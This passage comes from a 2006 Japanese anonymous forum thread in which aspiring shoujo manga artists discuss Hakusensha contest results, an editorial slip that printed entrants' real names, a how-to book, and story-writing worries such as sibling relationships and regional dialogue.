未記入で出しても多分受賞連絡時に聞かれて
誌面に載せられてるんじゃないかと予想

107 :花と名無しさん:2006/12/19(火) 13:12:48 ID:???0
>103
それはないと思うよ。
あるとしたらやっぱり極端に
若いか年寄りの場合だけじゃないかな。
誰だったか白泉の新人作家の人
担当さんは自分の年齢知らないと書いてた。
一度デビューしたらほとんど
年齢は関係ないと思う。

108 :花と名無しさん:2006/12/19(火) 14:12:15 ID:???O
10代なら伸び率に期待ってのもあるだろうけど、それを越えたら
雑誌タゲ層と年齢が離れるに従って、タゲが興味を引く絵柄や話が提供できるかの
重要度が上がってくだけのような気がする

でも若いものの雑誌カラーから掛け離れた作品の人と、年齢高いけど
雑誌に合った作品を描く人だったら、どっちを取る(優遇する)んだろ
即戦力なら後者だろうけど、技術的に大して差がない場合とか

109 :花と名無しさん:2006/12/19(火) 14:57:52 ID:???0
それはそのときの編集にしかわかんないでしょ。

110 :花と名無しさん:2006/12/19(火) 15:05:57 ID:???0
多分編集さんにとっては
そのときどきに出来上がってきた作品がすべてだと思う。
あと成長率とかみるにしても、作品で見るんじゃない?
年齢が若くても古い絵柄で完全に固定してしまっている人と、
最初は古くても、どんどん改善してゆける人では
年齢が上でも後者をとると思う。

111 :花と名無しさん:2006/12/19(火) 17:08:59 ID:???O
高齢を取る最大のデメリットは体力的な問題な気がするんだ
既に大御所で専属アシを雇ってるとかじゃないと病気になられたら…
勢いがなくなったら…と落ち着かなそう

112 :花と名無しさん:2006/12/19(火) 21:40:04 ID:???0
年齢出るのはすっごいショックだけど、
実はなにげに二十代多くて安心した…

HMCとか上位はほぼ二十代だったね

113 :花と名無しさん:2006/12/19(火) 21:42:03 ID:???0
締め切りを破って投稿した人は受賞してた?

114 :花と名無しさん:2006/12/20(水) 15:23:30 ID:???0
少女漫画家になろう!は白泉が求める傾向わかっていいね
なんか、改めて効果的に使った見本としてプロのカットを紹介されるとプロすげーって思った
てか、漫画描こう!ってより紹介された漫画という漫画が欲しくなった
なんか本末転倒
でも読むのも勉強だよね、うん

115 :花と名無しさん:2006/12/20(水) 17:37:13 ID:???0
今月のHMCで気になったんだけど。
選外の人たちの名前、全員本名で載っているような…。
今度から選外は本名で載せるようになったんだろうか。
それとも間違いなんだろうか。。

116 :花と名無しさん:2006/12/20(水) 17:53:40 ID:???O
本名だったね、訴えたら勝てるな、
訴えるのも恥ずかしすぎるが

117 :花と名無しさん:2006/12/20(水) 18:38:28 ID:???0
>>114
自分も買ったよ。意外と良かった
各誌編集長の雑誌に対する見解や方向性が書かれてたりして勉強になったよ
慎先生の漫画も面白かった
16pってあんな端的でもオーケーなんだと思ったし
自分いつも詰め込みすぎちゃうからなあ…

118 :花と名無しさん:2006/12/20(水) 19:09:49 ID:???0
HMC結果発表ページ製作者が今までの人じゃなくなったとか
従来の発表スタイルを知らない人が作ったのかな?
本名で打っちゃうってありえなさすぎるミスだし
載った人可哀相すぎる。
知人友人に内緒で投稿してる人もいるだろうに。

119 :花と名無しさん:2006/12/20(水) 19:16:24 ID:???0
選外まで見る人はかなり少数だろうけど、
断りのない個人情報の流出には違いない。
次号に謝罪文載るかな?

120 :花と名無しさん:2006/12/20(水) 21:15:34 ID:???0
選外本名って…確実にミスだよね。次にまわしてよかった。
珍しめの名前だから知り合いに見られたらごまかし効かない

121 :花と名無しさん:2006/12/20(水) 22:30:20 ID:???0
もしかしたら時間無くて普段違う仕事してるバイトに打たせたのかもね。
漫画賞の結果発表は選外だろうが入賞だろうが
全員PNで発表っていう漫画賞の常識を知らない
=漫画誌に疎い人じゃないと間違えようがないミスだよね。

122 :花と名無しさん:2006/12/20(水) 22:41:40 ID:???0
流し込むデータ間違えたとか・・・・。

それにしても誰か気づこうよ。

123 :花と名無しさん:2006/12/20(水) 23:01:11 ID:???0
少女漫画家になろう、私も今日読んだけど思ってた以上によかった
慎さんが投稿者に扮して書いた作品に花ゆめとララが批評してたのがすごく参考になった
白泉社に投稿してる人なら買って損しないと思うよ

124 :花と名無しさん:2006/12/20(水) 23:46:26 ID:???0
自分も内緒で投稿してる口だから本当に怖いミスだ
やーめーてー。来月は大丈夫かヌゲー不安
年齢とかも今回から出し始めてるし。ほんと止めて欲しい
でも今回のコレは謝罪文は出すべきだろうな。

少女漫画家になろう、そのまんまなタイトルに
本屋で良い年の女が買うには恥ずかしすぎるのだがw
迷ってたけど買ってみるかな

125 :花と名無しさん:2006/12/21(木) 00:47:47 ID:???0
ちょ、すごい欲しくなってきたじゃないか>漫画家になろう

HMC・・・
ラジオで本名読まれても裁判で勝てないと某法律番組で言ってたけど、
それでもやっぱり名前載った人たち気の毒過ぎるよ

126 :花と名無しさん:2006/12/21(木) 00:48:10 ID:???0
>>117
えなちゃんの漫画、ネームと本番内容変えてたりなんか慎さんリアルに投稿者になりきってたね
個人的にはネームの内容のが好きだけど、確かに編集さんが言うようにストーカーちっくwww
えなちゃんなんか親近感湧いていいキャラだった

127 :花と名無しさん:2006/12/21(木) 00:55:37 ID:???0
>>126
自分もネームの内容の方が面白いと思ったw

128 :花と名無しさん:2006/12/21(木) 00:59:25 ID:???0
>>125
ラジオとは状況が違う

129 :花と名無しさん:2006/12/21(木) 01:04:02 ID:???0
HMCはミス多いよね。
少し考えれば解ることだと思うのだが。

130 :花と名無しさん:2006/12/21(木) 01:45:38 ID:???0
9月のBC送った人、参加賞とか届きました?
初めて送ったもので勝手がわからなくて・・・
普通ならもう着てるころですか?

131 :花と名無しさん:2006/12/21(木) 20:02:18 ID:???0
評判が良いので少女漫画家になろう買ってみた。
タイトルはアレだけど花夢コミックスと装丁が同じだから
買うのは恥ずかしくなかった。

サイズが小さいから仕方ないけど1Pあたりの情報量が少ない。
表紙から複数の作家さんの情報があると思ったらほとんど一人。
いろんな人の過程とか見たいからこれは残念だった。

でもこの手の本にしては値段も手ごろだし、
傾向も分かるから白癬投稿者ならとりあえず買って損無いと思う。
>>85みたいな内容の本も欲しいな。

132 :花と名無しさん:2006/12/21(木) 21:02:59 ID:???O
今月の選外本名って来月もやるのかな?

続けられたらやっぱり気が引けるな

ミスだよね?

133 :花と名無しさん:2006/12/21(木) 21:55:46 ID:???0
慎さん好きだし買おうかな・・・>少女漫画家になろう
ただやっぱり店頭で買う勇気はとてもないので、
通販になるけども・・・・。

134 :花と名無しさん:2006/12/21(木) 22:44:46 ID:???0
選外が全員本名くせえ?と思って
今月と先月の結果と募集要項を比べていて気付いたんですが,
ベストギャグ賞が今回からなくなったんですね。
でも先月の募集要項にベストギャグ賞の記載があるんだから
今月は「該当なし」とか書いておかなきゃウソになるんじゃなかろうか。

まあ,ギャグの投稿がないってことなんだろうけど。

135 :花と名無しさん:2006/12/22(金) 01:25:35 ID:???0
本名で載ってたorz
PNの方が普通の名前っぽいから間違われたのかな…o rz
と本気で落ち込んでたら、選外全員本名だったんか。
ならいいや…あんまよくないけど。

てゆうか、今回かなり頑張って描いただけに落ち込んだ…
1日とかでやっつけで描いた奴がベスト30とかに割と簡単に入ってたから、
今回はいつもはやっつけな絵を頑張ったし上位いけるかなーと
期待してただけに、選外+本名…orz

選考基準が変わったとかなのかなー
もう花は諦めようかなー

136 :花と名無しさん:2006/12/22(金) 01:29:50 ID:???0
本名の件、編集部に苦情の電話とか来てないのかな?
今後も本名で発表なんてありえないだろうしどう考えてもミスだよね。
謝罪は締め切りに間に合えば次号に載るか?

137 :花と名無しさん:2006/12/22(金) 01:43:15 ID:???O
苦情や問い合わせがあって気付いてるなら
次号発売より前にHP上で謝罪文だしたりしないのかな
スケジュール的に謝罪が次号に掲載できるのかはわからないけど
とりあえず白泉HPの雑誌別ページなら、すぐ対応できるよね

138 :花と名無しさん:2006/12/22(金) 01:51:33 ID:???0
>>135
お、乙・・・。
絵は、今回頑張った分だけ今後の成果に現れるさ。

本名の件は自分だったら泣き寝入りかなあ。
学校や職場で「あなた花ゆめに投稿してない?」なんて
言われる人が一人もいない事を祈るよ。

139 :花と名無しさん:2006/12/22(金) 02:00:33 ID:???0
そこから先は「実は私も投稿してて…」という展開を希望。

該当者の方々本当にお疲れ様です…

140 :花と名無しさん:2006/12/22(金) 02:03:38 ID:???0
苦情言うったって、選外だもんね…
ああすいませんね、次は頑張って選外抜け出してくださいねガチャ!
とか言われても文句言えないわなあ。選外だもん。

ちゅうか選外なんて中学生ん時以来な135です。

今は早く原稿返って来て欲しい…ただそれだけ。
電話かけて直接取りに行くとかってナシでしょうか?

141 :花と名無しさん:2006/12/22(金) 02:56:07 ID:???0
>>140
自虐かもしれないけど選外で頑張ってる人のことも考えて。
とりあえず電話で聞いてみるといいと思う。

142 :花と名無しさん:2006/12/22(金) 07:28:31 ID:???0
>>135
自分なんか一度
デビュー一歩手前の賞をとった次が
選外だったよと言ってみる。
花夢じゃないけれども。

143 :花と名無しさん:2006/12/22(金) 12:24:19 ID:???0
>>140
本名の件はつらいだろうけど、もう少し言葉選んだほうがいいよ。

144 :花と名無しさん:2006/12/22(金) 12:32:29 ID:???O
志望者だったら印象悪くなるかもと思って文句言えないんじゃないかな…?

>>140
調子乗り杉かと

145 :花と名無しさん:2006/12/22(金) 12:47:24 ID:???0
ぶっちゃけ、投稿者以外は選外の欄なんて見てないと思われ。
逆に謝罪文なんて出されたら注目する人が出てきちゃうかもしれん

146 :花と名無しさん:2006/12/22(金) 12:49:20 ID:???0
>>140
花は最近選考レベルが高くなっている気はするよ。
上から下に落ちても頑張ってる人はいるからいじけず頑張って。
自分も前一回落ちてショックだったが負けずに頑張ったから上にあがれたよ。
やっぱりその白泉でデビューしたいから

147 :花と名無しさん:2006/12/22(金) 13:22:49 ID:???0
正直一瞬、お前ら本名出されたくなかったら上
(上位入賞PN発表)まで這い上がって来いって
華編集部からの愛の鞭かよ?と思ったw

でも、謝罪ッツーか今度のHMCの欄外にでも
小さくお詫びが乗る位はした方が良いんじゃね、とは思う
一応個人情報だしまさか本名で載るなんて投稿者は
思ってなかった訳だしさ。

148 :花と名無しさん:2006/12/22(金) 17:27:01 ID:???0
個人情報保護法はどこに…

149 :花と名無しさん:2006/12/22(金) 18:12:42 ID:???0
おわびは個人個人にするべきじゃね。
これでHPとか来月とかに本名で載せてすみません、とか書いたら、
気付いてなかった奴にまで気付かせるだけ。

150 :花と名無しさん:2006/12/22(金) 18:22:18 ID:???O
花ゆめでしか読めないコアな話が読みたいな。
今の状態って絵にも正直りなちゃみたいな華
(上手い下手ではない)ないし、ガソガソみたいな濃さもない
…味のないシフォンケーキみたい
要はヌル喫のケーキみたいな感じ

ガソガソとかがいいとは思わないが

151 :花と名無しさん:2006/12/22(金) 18:24:20 ID:???O
誤爆したorz
すまん。

投稿者の人ガンガって花ゆめを盛り上げてくれ

152 :花と名無しさん:2006/12/22(金) 18:31:02 ID:???0
>>142
選考基準は会社によって違うよ
中には上の都合でデビュー者を出せないところもあるとか…

豚だけど
投稿漫画描くのに必要以上に神経質になってしまう・・・
主人公とヒーローの名前は特徴あって覚えやすい?
初めて読む人にもキャラのあだ名の由来分かる?
年齢設定は話にあってる?
主人公が同性と仲いい描写ある?
ヒーローが同性と仲良いい描写ある?
出会いのシーンで相手に好感を持たれる言動してる?
設定に説得力はある?etc
同人のころは何も考えないで描いてたのにorz
わたしだけか〜

153 :花と名無しさん:2006/12/22(金) 18:40:43 ID:???O
>>152
そういうの大切だけど、アイデアが閃いていない段階からとらわれるのは
あまりよくない気がする。

154 :花と名無しさん:2006/12/22(金) 20:51:31 ID:???0
>>152
自分はそういうの気にしなさすぎでよく玉砕してる。
自分ではたいした問題じゃないと思ってることでも
読者はそういう部分でまずつまづいて
読んでくれなかったり最後まで?だったりするので
大切だと思う。

155 :花と名無しさん:2006/12/23(土) 14:51:27 ID:???0
もらった複製原画に「だいこん用」って書かれてたんだけど
どういうことかな・・・??

156 :花と名無しさん:2006/12/23(土) 15:47:34 ID:???0
「だいたいこんな感じ」って意

157 :花と名無しさん:2006/12/23(土) 17:12:22 ID:???0
慎さんの作品が読めるらしいから「少女まんが家になろう!」を買ってみたけど、
デジタル原稿についてかなりページ割いてるのに驚いた。
奨励しているわけじゃないだろうし、世間の流れに合わせて載せただけ
だろうけど、メディア添付可なら1度デジ原で出してみようかと思ったよ。

全く関係ないが別花編集長、編集王やジャンケン隊の八巻さんかと
思ってびっくりしたw

158 :花と名無しさん:2006/12/23(土) 17:18:33 ID:???O
漫画描こう描こうと思いつつ、結局一度も描かずにもうすぐハタチ迎えるorz
同人すらやってなかったからかなり出遅れてるなあ。
2ちゃんやってる暇があるならさっさと描けって話だ・・・

159 :花と名無しさん:2006/12/23(土) 17:24:10 ID:???0
>>157
自分もまさかデジタルについて書いてるとは思わなかったよ。
個人的にはそのまま単純にデジタルを奨励してるんだと感じたけど。
迷ってたけどデジタルに手を出してみようかな…

160 :花と名無しさん:2006/12/23(土) 17:35:36 ID:???0
線はアナログのほうが描けるけど
トーンもったいねーとか思ってしまう貧乏性だから
デジタルおkはありがたい。

>>158
最初の一歩が大変だけどがんばれ。

161 :花と名無しさん:2006/12/23(土) 22:54:25 ID:???O
>>153
もともと気にしない(欠点が分からない?)タイプだったんだが
描く前から自己主張の強い兄弟に机にあるネームを見られて
「百%_wwwwwwww何でこうなるの?w何でこうなるの?w社会勉強からしなおせwwwww」
と言われる→自信をなくして筆を止める
を繰り返して神経過敏になった………。

なんでこんなに漫画の描きにくい家に生まれたんだろう。
一人暮らししようかな(泣)。

162 :花と名無しさん:2006/12/23(土) 23:39:44 ID:???0
(泣)って。
客観的に見てくれる人が身近にいるのはいいことだと思うけどなあ…

163 :花と名無しさん:2006/12/23(土) 23:48:15 ID:???0
うん、うらやましい。
逆に「じゃあどんなふうになるのが自然?」とか色々聞きたい。

164 :花と名無しさん:2006/12/23(土) 23:55:14 ID:???0
でもどれだけ「客観的」かはわからん。
編集に言われるならまだしも、
評論家気取りのただのヲタに言われると
内容がもっともだったとしても
素直にきけないような気がする。
かえって精神的に悪いような気がするから
あまりストレスになるようなら
一人暮らしもいんじゃない?

165 :花と名無しさん:2006/12/24(日) 00:14:30 ID:???0
それなら机の上とかにネーム放置しなきゃいいんじゃない。

166 :花と名無しさん:2006/12/24(日) 00:47:55 ID:???0
実際社会勉強は必要だよ。
一人暮らしなんかして人に見せずに描いていても、改善されないと思うな。
漫画なんて他人が読んでなんぼなわけだし。
ていうか兄弟の自己主張って何の関係があんの?
ひとのやることに難癖つけなきゃ気がすまないタイプの人なら、
家を出ることも考えた方がいいかもだけど。

167 :花と名無しさん:2006/12/24(日) 00:48:00 ID:???0
うちは完全に見えない(見れない)ようにしてるなぁ・・・>漫画関連のもの
ネームとか見られんの本当にいやだし・・
兄弟と第3者は、見られる方も見る方も全然気持ちが違うと思う

168 :花と名無しさん:2006/12/24(日) 00:54:32 ID:???0
兄弟関係によるなあ。
上に3人いるんだけど、いちばん歳の近い兄弟なら見せられる。
というより一番の読者で一番的確なツッコミをくれる。
あと、消しゴムかけてくれるw
一度、自分ではイイ!って思ってたところにつっこまれて、でも
脳内麻薬でてたっていうか、自分では客観的に見られなくてそのまま
強気で出したらまさにそのつっこまれたところを厳しく評価されてたことがあった。
同じ兄弟でも、一番上とかには絶対に見せられないけど。

169 :花と名無しさん:2006/12/24(日) 01:13:21 ID:???0
どんな情況でも漫画を描いてる人はいる。
161は現状に愚痴を言ってるだけにしかみえない。
なんでこんな家に生まれたんだろうとか言われてもね…
一人暮らしできる経済的・精神的余裕があるなら愚痴る前に実行すれば?

170 :花と名無しさん:2006/12/24(日) 01:17:16 ID:???0
ネームがとりあえず完成したけど
何かひっかかってる・・・・
多分このままじゃダメなんだろうけど
どこをどうしたらいいんだろう・・・

今友達にも見てもらってて返事街。
頼みもしないのに勝手にあれこれ
言われるのは嫌だけど
168の言うようにある程度
信頼おける人には頼んで見てもらってる。

171 :167:2006/12/24(日) 01:35:24 ID:???0
うっうらやましい・・・>>168
私、兄と一番近くても7つ離れてるんだよね・・・orz
客観的には見てくれるかもしれないが、どこか擁護的になると思うんだよな
多分、私が絵が好きであることは知ってるだろうけど
漫画家目指してるとは知らないだろうなぁ・・・

172 :花と名無しさん:2006/12/24(日) 03:47:24 ID:???O
>>161
153だけど、第三者の捉え方を気にすることはもちろん大切。
でもキャラや話がまっさらな段階から気にしすぎると、
自分はだめになる。
自分の場合、伝えたいものはこれだと決まった上で
見え方、見せ方を考えてる。
担当がついた時、何度もだめ出しされて
何描くにもその人を意識しすぎて、一時
スランプになった…


173 :花と名無しさん:2006/12/24(日) 13:14:06 ID:???O
>>168
自分は逆で、一番上の兄と相性が良くて
年の近い姉とは水と油の関係だ
オタクで大人しくて年の離れた妹が欲しい今日この頃(´・ω・`)
年の差はプラマイ10までは気にならないようだ
タメで気が合うのが最強だけどな

174 :花と名無しさん:2006/12/24(日) 18:02:03 ID:???O
正直どうでもよい

175 :花と名無しさん:2006/12/24(日) 18:44:08 ID:???0
兄持ちの妹やたら多いな
確かにどうでもいいけどw

176 :花と名無しさん:2006/12/25(月) 00:35:25 ID:???O
姉という立場の人は姉としての責任感とかでしっかりした人がわりと多いから
漫画家なんて不安定な商売は目指さないのかも?
うちの回りで漫画家目指してるのは一人っ子か妹が多い
この中でデビューして10年後まで残れるのはどれくらいなんだろうと考えて少し欝
あと一週間で締切だから欝ってる場合じゃないんだが…

177 :花と名無しさん:2006/12/25(月) 09:21:35 ID:???0
今回ザ花に乗ってる、デビューした方々
歳の近い方が多い&自分とのあまりの違いにへこむ・・・
最近ネームがやっと納得いくカタチで終わって、ほとんど始めての状態で
原稿用紙に下書き始めたんだけど、下手すぎる・・・・
チラ裏スマソ・・・orz

178 :177:2006/12/25(月) 09:22:28 ID:???0
×乗ってる ○載ってる
です・・・スマソ・・・

179 :花と名無しさん:2006/12/25(月) 16:00:24 ID:???0
クリスマスなんて関係なしにネーム中ですよっと。
進まねええええ

>>177
凹む気持ちは良く解るけど、本当に漫画って描くことでしか
上達できないと思うんだ。画面処理の仕方とかも
原稿量をこなすうち自分なりのやり片、書き方出来上がっていくんだと思う
初めてならとりあえず、『丁寧に』を心がけて頑張れば良いとオモ
偉そうにスマソ。

180 :花と名無しさん:2006/12/26(火) 15:05:29 ID:???O
>>176
〜が多いってのは偏見じゃないの?
姉の立場の漫画家も結構いるよ。右京あやねとか八神千歳とか。

偏見といえば、教科書に書かれてない世間一般的(多数派)の感覚と
自分の感覚がずれてると困る。
「生徒会長は学校一の完璧超人がなるのが通例」
「金持ちと凡人のカップルと美形と不細工のカップルは似合わない」
「女が素直に誕生日を喜べるのは23まで」
例えばそんなイメージが自分にはないorz
テンプレを抑えなきゃ逆転の発想や予想外ネタも使えん。
逆に自分的常識を「これどういう意味?」と突っ込まれるとゲッとなる。
でも人によっては意味が通じたりでどっちが正しいのやら。

181 :花と名無しさん:2006/12/26(火) 15:14:25 ID:???0
妹って立場の人は姉の立場の人より、早くから漫画に触れる可能性が高く、
一人っ子の立場の人より多くの漫画を読む機会がある。

コレは事実

182 :花と名無しさん:2006/12/26(火) 15:23:15 ID:???0
近頃は親も漫画を読むし、あんまり当てにならんとオモ
確かに自分は姉の読んでいる漫画を読んでいたから、
姉よりははやくたくさんの漫画を読んでいたが。
一人っ子は偏見じゃね?友達は一人っ子だからこづかいも多く、
うらやましいくらいどんどん漫画を買っていた。

自分の育った環境以外の人の心理がよくわからない、ってのはあるなあ。
一人っ子の感覚はよくわからないし。
自分は兄弟が多いせいもあって、親とはあんまり関わらずに生きてきたんだよ。
叱られるのも兄にだったり。
だから親兄弟の描き方が、他の人に共感してもらえるように描けているかが
わからないと思う。

183 :花と名無しさん:2006/12/26(火) 15:24:09 ID:???0
…どうでもよくない?w

184 :花と名無しさん:2006/12/26(火) 15:33:20 ID:???0
どうでもいいな。
ああでも一人っ子からすると、兄弟を描くのは難しい、かも。

185 :花と名無しさん:2006/12/26(火) 16:26:36 ID:???0
兄弟いる立場からすると近親相姦モノってありえない。キモイ。

186 :花と名無しさん:2006/12/26(火) 16:39:03 ID:???0
兄はいないがそれはありえない。砂糖家族がキモすぎて・・・


187 :花と名無しさん:2006/12/26(火) 16:43:11 ID:???0
家族大好きだから家族を溺愛する気持ちはわかる。
兄でも姉でも妹でも弟でも。
でもそれが恋愛感情に摩り替わるというのは自分はちっとも分からない…。

188 :花と名無しさん:2006/12/26(火) 16:50:01 ID:???0
自分も家族大好きだが、逆に不仲な家庭で育った人物の
心理描写が苦手。どうも嘘くさくなる。
でもこういうのを「体験したことないから描けない」とか言ってるようじゃ
引き出しせまいまんま成長しないんだよね…

189 :177:2006/12/26(火) 17:19:46 ID:???O
>>179
そうですよね。まずは完成させることですよね。
阿保の愚痴にかまってくれてありがとうございました。頑張ります。

190 :花と名無しさん:2006/12/26(火) 22:07:55 ID:???0
>>185
特に仲良くもないし悪くもない弟がいるが、
普通に近親相姦ものを描こうとしていた自分・・・orz

漫画は漫画と完全割り切ってそこらへんは描いてた。
ただその設定を乗り越えられるだけの
説得力を話にもたせられなくて自己ボツしたけど。

191 :花と名無しさん:2006/12/27(水) 00:32:38 ID:???0
>ただその設定を乗り越えられるだけの
>説得力を話にもたせられなくて自己ボツしたけど。
砂糖家族の作者に言って貰いたいw

192 :花と名無しさん:2006/12/27(水) 03:45:35 ID:???O
自分は、弟がお姉ちゃんを好きな話って何か好き。
描きたいと思うし。

(自分に兄がいるからか)兄妹は嫌だけど…

193 :花と名無しさん:2006/12/27(水) 04:00:45 ID:???0
過保護ネタとかならかけるけど、禁断の愛は気持ち悪くて無理。
「絶対ありえん!!」と思ってるから、もし描こうとしても嘘くさくなると思う

194 :花と名無しさん:2006/12/27(水) 06:33:27 ID:???O
「絶対ありえん」と否定から入るのはどうかと…
描くものの幅が狭くなるとおもう
でも雑誌の雰囲気もあるから近親相姦ネタ描けなくても全然困らないけど

195 :190:2006/12/27(水) 07:40:32 ID:???0
>191
でも砂糖家族って
血はつながってないんだよね?
(ちゃんと読んだことないので
そのへん知らないんだけど)
それにコメディ調だしね。
自分のは血がつながってる上に
シリアスだったので本当に
gdgdで失笑物だったよ・・・orz。

196 :花と名無しさん:2006/12/27(水) 15:31:16 ID:???0
ファンタジーは描けるけど、近親相姦は描けない。
描きたいと思わないし、それで幅が狭くなったと思わない。

197 :花と名無しさん:2006/12/27(水) 15:57:04 ID:???0
そろそろスレ違いでは?

198 :花と名無しさん:2006/12/27(水) 16:07:12 ID:???0
スレ違いかな?
描けるネタ描けないネタの意見交換は有効だと思うけど?

199 :花と名無しさん:2006/12/27(水) 16:08:18 ID:???O
漫画の内容に関してだからそんなにスレ違いでもないような気がするけど

>196
近親相姦に関してじゃなくて
全面否定の姿勢が視野が狭いというか頭が固いというか
描くものの幅が狭くなるとおもう

200 :花と名無しさん:2006/12/27(水) 17:41:01 ID:???O
近親相姦描きたいならそういう雑誌に行けばいい

201 :花と名無しさん:2006/12/27(水) 18:23:55 ID:???0
近親相姦は特別な感じ。
知っててヤルか、知らないでヤルかによっても違うけど。
前者は描けないけど後者は描ける

202 :花と名無しさん:2006/12/27(水) 18:34:54 ID:???0
関東在住の人にききたい。
語尾に「だぜ」ってつけて喋ってる人は普通にいる?
男キャラのセリフ考えるとき、どうしても語尾が「だぜ」にしかできないとこあって
「だぜ」ってなんだよ…ってなってしまう関西人なんだけど。
漫画とか以外でも使われてるものなのか、ダサくないのかって不安になるんだよね。


203 :花と名無しさん:2006/12/27(水) 18:40:10 ID:???0
東京ですが「だぜ」ってあんま聞かないよ。
「だろ」とか「だ」とかは聞くけど。
確実にダサく聞こえると思う。バーローみたいに…

204 :花と名無しさん:2006/12/27(水) 18:47:06 ID:???O
「だぜ」は勘違いっぽくてダサいね。

205 :花と名無しさん:2006/12/27(水) 18:50:41 ID:???0
昔東京の男の人(若い人)に
「だぜ」って言われて吹いてしまったw
漫画だとたまに見るけど
日常的にはあまり使わないだろうね。

そういう自分もずっと関西なので、
関東のワカモノの言葉遣いがわからない・・・。


206 :花と名無しさん:2006/12/27(水) 18:56:04 ID:???0
兄がいる妹が白泉志望に多いのは
小さい頃から普通に少年漫画を読んでいる影響があると思う
少女幼年誌だけしか読んでいなかったら漫画家目指してない気がする

ちなみに自分も兄いるけど確かに近親相姦ものはちょっと…
実際そうなったら精神が対応できなくて人格分裂すると思うw
少女漫画展開じゃなくてサイコサスペンスの始まりだなw

>>202
使い方にもよると思うけど、確かに普通に会話していて「だぜ」はあまり聞かない
(自分は一応関東圏だけど東京じゃないのであまり参考にはならないかも)

207 :206:2006/12/27(水) 18:58:19 ID:???0
言葉足りなかった orz
少女幼年誌だけしか読んでなかったら目指してないのは一般的にじゃなく
自分がってことね

208 :花と名無しさん:2006/12/27(水) 19:01:37 ID:???0
「知ってて近親相姦」は「獣姦」っぽい感じする

209 :花と名無しさん:2006/12/27(水) 19:05:51 ID:???0
>>202
>>205
自分は逆に関西弁わかるのが羨ましい
関西弁キャラを出そうと思ってセリフを考えても
何となくウソっぽくなる気がしてならない

210 :花と名無しさん:2006/12/27(水) 22:04:06 ID:???0
ネイティブか住んだことないと言葉はホント嘘くさいよ。
添削頼める人がいればいいけどね。

211 :花と名無しさん:2006/12/27(水) 22:26:33 ID:???0
>>182
家族と不仲な自分が通りますよ…
子供のころ上の兄弟がなかなかゲームや漫画を貸してもらえなかったんだが
親が上の子ばっかり贔屓して「年上なんだから我慢して譲ってあげなさい」って言ってくれないorz
(一番問題なのはわたしが喧嘩に弱いことだけど)
流行りのゲームは兄がやってるとこ見てるのが殆どですた。
流行りのアニメも兄の部屋のテレビで。
しかも親は高学歴カタギで考えが古いから漫画やゲームやデジタルにめっさ偏見持ってる。
自分の家がこんなんだから一人っ子で漫画好きの親持ちの従兄弟(男)が羨ましかったよ。
ギャルゲーも格ゲーもやり放題だしヤンキーファッションもし放題。
ヤンキー入った友達たくさん連れててもゲーセン行っても親に文句言われなくて
うちの兄弟よりずっと楽しそう(つか、普通?)に見える。

>>182とは逆で自分の育った環境以外の人の心理のほうがよく分かるな。
ないものねだりというやつで。


212 :花と名無しさん:2006/12/27(水) 22:51:20 ID:???0
>ギャルゲーも格ゲーもやり放題だしヤンキーファッションもし放題。
>ヤンキー入った友達たくさん連れててもゲーセン行っても親に文句言われなくて
それは…親びびって言えないだけでは…。

213 :花と名無しさん:2006/12/27(水) 23:25:28 ID:???0
それ、心理がわかるとか言えるのか?
結局一番わかるのは、そうやって抑圧されていると思っている自分の心理だろ。
てかよくわからんのだが、親はデジタルに偏見持ってるけど
兄はそれを与えられていたわけ?
あと年上だから、って言ってもらえるのを待っているのはどうかと思うけど。


214 :花と名無しさん:2006/12/28(木) 00:31:57 ID:???0
文章読む限り相手の心理なんてまったくわかってないかと。
度を過ぎた自分語りはそろそろほどほどに…。

215 :花と名無しさん:2006/12/28(木) 02:13:32 ID:???0
>>213
携帯やTVゲーム機持ってないと学校で話題についていけないと
いじめられると思って仕方なくって感じじゃ。
あと、昔はゲームは男の子がやるものだったから?

>>214
たまにいるよね。自分語りに精一杯で相手を見てない人。
内容が自我自賛だったらもう耐えられない。

216 :花と名無しさん:2006/12/28(木) 02:20:08 ID:???0
二行目、学校で話題についていけなくてだスマソ

217 :花と名無しさん:2006/12/28(木) 02:46:11 ID:???0
211は一人っ子の心理を理解してないと思う。
自分は兄弟喧嘩とかの話を聞くと羨ましくてしょうがなかった。
おもちゃは買ってもらえても、兄弟は買えないしね。

子供の頃は「兄弟欲しい」ってねだったけど、
最近になって、実は親は子供ができにくい体質だったって知った。
「兄弟欲しい」ってねだられた親は辛かったと思う。

あと、親の期待が凄かった。1点集中って感じ。
凄い望んで産まれた子供だったからかもだけど、
高校の頃とかプレッシャーで胃をおかしくした。

自分の育った環境以外の人の+の面は見えやすいけど
ーの面はわかりにくいね。

218 :花と名無しさん:2006/12/28(木) 02:51:10 ID:???0
自分語りはほどほどに・・・

219 :花と名無しさん:2006/12/28(木) 03:55:09 ID:???0
トラウマに近親相姦
白泉スレらしいじゃないか…

220 :花と名無しさん:2006/12/28(木) 04:02:52 ID:???0
>>211
従兄弟の心理を述べよ

221 :花と名無しさん:2006/12/28(木) 08:40:49 ID:???0
>ヤンキー入った友達たくさん連れててもゲーセン行っても親に文句言われなくて

むしろこれは放置されてると思った方が・・・。
自分だったらこんな親に育ててもらわなくて
よかったと、少なくともいい年になった今なら思う。
211は現役学生さんなのかもしれないけど、
もう少し年くったら親に感謝する日がくるよ・・・。

ちなみに自分は長女で、
ゲームもドラマも歌番組もバラエティも
全部禁止されて育った。
だから当時はもちろん今も、
その当時の話になると同級生とまったく
話が合わないよー。
ちょと寂しい。

222 :花と名無しさん:2006/12/28(木) 09:56:50 ID:???0
激 し く ど う で も い い

223 :花と名無しさん:2006/12/28(木) 10:05:39 ID:???0
色んな立場の人の、
その立場の良い面と悪い面を想像できるようにしたい。

一人っ子っていってもいろんな一人っ子が居るし、
姉だからと言ってしっかりした人とはかぎらないし、
変なテンプレに当てはめないでキャラを作らないとマンネリ化する

224 :花と名無しさん:2006/12/28(木) 10:48:07 ID:???0
なんかどうでもいいと思うのは勝手だが
なら違う話題ふれよと思う。
どうでもいいと一言だけ残してゆくヤシが
一番ウザイ。

225 :花と名無しさん:2006/12/28(木) 10:53:57 ID:???0
オマエモナー

226 :花と名無しさん:2006/12/28(木) 10:55:05 ID:???0
今年中にネームを送らないとと
思ってるうちに校了期に入ってしまい
そのまま年末になってしまった・・・orz。
担当さんに年賀状出したいが、
「ネームもしてねーくせに
何年賀状なんて描いてんだ」
とか思われそうだ・・・orz
それ以前に忘れられてそうだ・・・orz

227 :花と名無しさん:2006/12/28(木) 10:56:05 ID:???0
「ヤシ」も「オマエモナー」も
なんかひさびさに見た。


いや、それだけなんだけど。
なんだか懐かしいうやりとりだw

228 :花と名無しさん:2006/12/28(木) 11:01:07 ID:???0
